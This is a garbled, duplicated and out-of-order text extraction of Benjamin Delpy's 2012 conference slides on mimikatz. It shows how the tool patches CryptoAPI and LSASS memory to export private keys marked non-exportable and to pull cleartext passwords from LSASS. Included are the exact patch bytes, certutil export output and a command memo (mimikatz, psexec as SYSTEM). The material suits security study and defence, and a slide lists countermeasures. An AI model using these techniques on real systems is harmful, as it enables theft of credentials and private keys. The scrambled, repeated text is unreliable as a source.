07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6 6
LsaSS WinLogon
Authentication Packages msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge Response
userdomainpassword
PLAYSKOOL
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
